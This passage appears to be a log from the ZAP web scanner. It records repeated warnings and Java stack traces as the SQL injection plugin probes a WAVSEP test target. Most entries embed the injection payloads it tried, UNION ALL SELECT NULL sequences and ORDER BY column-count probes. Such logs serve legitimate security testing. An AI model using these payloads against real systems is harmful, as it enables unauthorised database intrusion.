ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682576 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682577 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682577 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682578 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682579 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682580 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682581 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682582 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682582 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682583 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682584 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 6769#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' ORDER BY 6769# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682585 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at 